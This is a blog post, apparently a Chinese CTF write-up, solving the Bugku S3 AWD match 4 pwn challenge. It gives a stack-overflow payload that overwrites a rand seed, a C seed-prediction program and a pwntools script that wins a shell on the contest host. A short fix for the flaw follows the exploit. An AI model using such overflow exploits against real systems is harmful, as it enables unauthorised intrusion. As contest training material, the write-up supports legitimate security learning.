Bugku S3 AWD排位赛-4 pwn

最新推荐文章于 2024-08-16 15:32:55 发布
最新推荐文章于 2024-08-16 15:32:55 发布
阅读量988 收藏
点赞数 2
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/126799495
版权
本文讲述了作者对于Bugku S3AWD排位赛中Pwn环节的不满,包括队伍排名异常、环境设计缺陷和漏洞利用技巧。提到web与pwn共用环境导致不公平,以及通过特定手法如栈溢出和联合编程获取Flag的过程。
摘要由CSDN通过智能技术生成

Bugku S3 AWD排位赛-4 pwn
吐槽一下,好几个战队什么都没干的突然飞到前10,一轮开始几秒之后一个队直接飞到8千多分,pwn打完一轮从第二轮就打不了了。。。。。对pwn手极度不友好
设计的还有点有缺陷的,web和pwn都用的一个环境,web可以直接拿到pwn的flag(cat /home/ctf/flag),导致了web手能直接拿双倍的分(web+pwn),分两个环境就可以解决问题了。。
在这里插入图片描述
栈溢出,把seed覆盖成1,然后写个c程序算对100次结果,也可以使用python+c的联合编程
对100次就可以拿到flag
修起来也简单,直接把下面的fgets的64改成16就可以了,再提一嘴,pwn patch好了之后覆盖了原来的pwn会出现pwn运行不起来的情况:(,就出现了web+pwn双宕机

#include <stdio.h>

int main(int argc, char **argv){
	int i;
	srand(1);
	int v8;
	for(i = 0; i < 100; i ++){

		v8 = rand() % 100000 + 1;
		printf("%d\n", v8);
	}

	return 0;
}

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('192-168-1-137.awd.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p1 = b'a' * 0x40 + p64(1)
r.sendlineafter('Who goes there?', p1)

p = [
89384,
30887,
92778,
36916,
47794,
38336,
85387,
60493,
16650,
41422,
2363,
90028,
68691,
20060,
97764,
13927,
80541,
83427,
89173,
55737,
5212,
95369,
2568,
56430,
65783,
21531,
22863,
65124,
74068,
3136,
13930,
79803,
34023,
23059,
33070,
98168,
61394,
18457,
75012,
78043,
76230,
77374,
84422,
44920,
13785,
98538,
75199,
94325,
98316,
64371,
66414,
3527,
76092,
68981,
59957,
41874,
6863,
99171,
6997,
97282,
2306,
20926,
77085,
36328,
60337,
26506,
50847,
21730,
61314,
25858,
16125,
53896,
19583,
546,
98815,
33368,
15435,
90365,
44044,
13751,
71088,
26809,
17277,
47179,
95789,
93585,
5404,
2652,
92755,
12400,
99933,
95061,
49677,
93369,
47740,
10013,
36227,
98587,
48095,
97540
]

for i in p:
    r.sendline(str(i))

r.interactive()
【2020安洵杯线下赛】AWD的第一道pwn
古月浪子的博客
12-18 2511
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
Bugku S3 AWD排位赛-2 pwn
z1r0的博客
08-13 649
可以通过s溢出改掉v5,满足条件即可。
BugKu CTF Crypto:EasyMath & 缝合加密 & 一段 Base64 & 奇怪的密码
最新发布
Flag少侠的博客
08-16 8376
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
Bugku S3 AWD排位赛-3(带你入门awd流程)
Welcome To Myon'Blog !
09-03 4334
1、注意事项 2、xshell连接与html目录下载 3、D盾与河马的使用(文件扫描) 4、Seay的使用(代码审计) 5、爆破对手的IP地址 6、其他 (1)mysql远程访问漏洞 (2)Redis未授权访问漏洞 (3)pwn漏洞
Bugku S3 AWD排位赛-1 pwn
z1r0的博客
07-31 1226
利用格式化漏洞改a64l为system,v4传入/bin/sh即可getshell。因为s只能32,所以偏移可以采用gdb调试出来。
Bugku S3 AWD排位赛-5 pwn
z1r0的博客
09-24 1136
修漏洞这里笔者直接把execve(“/bin/sh”, 0LL, 0LL);改成execve(0, 0LL, 0LL);,但转念一想,gets这个漏洞大部分人都不会修,所以笔者就直接写了第二份exp,也就是ret2libc。结果不出所料,有些队只会修execv,但是不会修gets,所以成功打到全场。栈溢出,直接ret2text。
easycms v5.5 分析 | Bugku S3 AWD排位赛
qq_56313338的博客
09-15 1330
bugku awd中的cmseasy 5.5代码审计,分析路由规则,sql注入分析,不登陆进行文件上传getshell
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-8.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
S2 AWD排位赛-6.zip
12-07
【S2 AWD排位赛-6.zip】这个压缩包文件是BugKu在2021年举办的一场Capture The Flag(CTF) Automated Web Defense(AWD排位赛的真实比赛题目集合。CTF是一种信息安全竞赛,参赛者通过解决各种安全问题来得分,而...
AWD攻防比赛 webshell
04-01
webshell,通过网页获取主机资源
PwnWAF:用于AWDpwn日志工具
05-16
PWA文件 用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
网鼎杯2020半决赛awdplus题目
12-07
网鼎杯2020半决赛awd plus题目,包含pwn和web,解压密码在公告文本里。pwn ciri未开放无解压密码
S2 AWD排位赛-11.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
S2 AWD排位赛-9.zip
12-07
【S2 AWD排位赛-9.zip】这个压缩包文件是BugKu在2021年举办的一场CTF(Capture The Flag)攻防战排位赛的真实题目集合。CTF是一种网络安全竞赛,参赛者通过解密、逆向工程、漏洞挖掘等技术手段获取“旗标”(Flag)...
BugKu -- AWD --S1排位赛-1
jiuyongpinyin的博客
04-06 1317
BugKu -- AWD --S1排位赛-1
记一次bugku awdpwn
z1r0的博客
03-27 2237
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
BugKu -- AWD --初探门路
jiuyongpinyin的博客
02-24 1806
BugKu -- AWD
bugku s3 awd排位赛-11
12-08
bugku s3 awd排位赛-11是指《步步高升》第三季的AWD排位赛第11场比赛。在这场比赛中,选手们将使用AWD(全驱)车辆进行排位赛,争夺最佳的出发位置。 在这场比赛中,选手们需要在赛道上展现出极致的驾驶技术和车辆...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值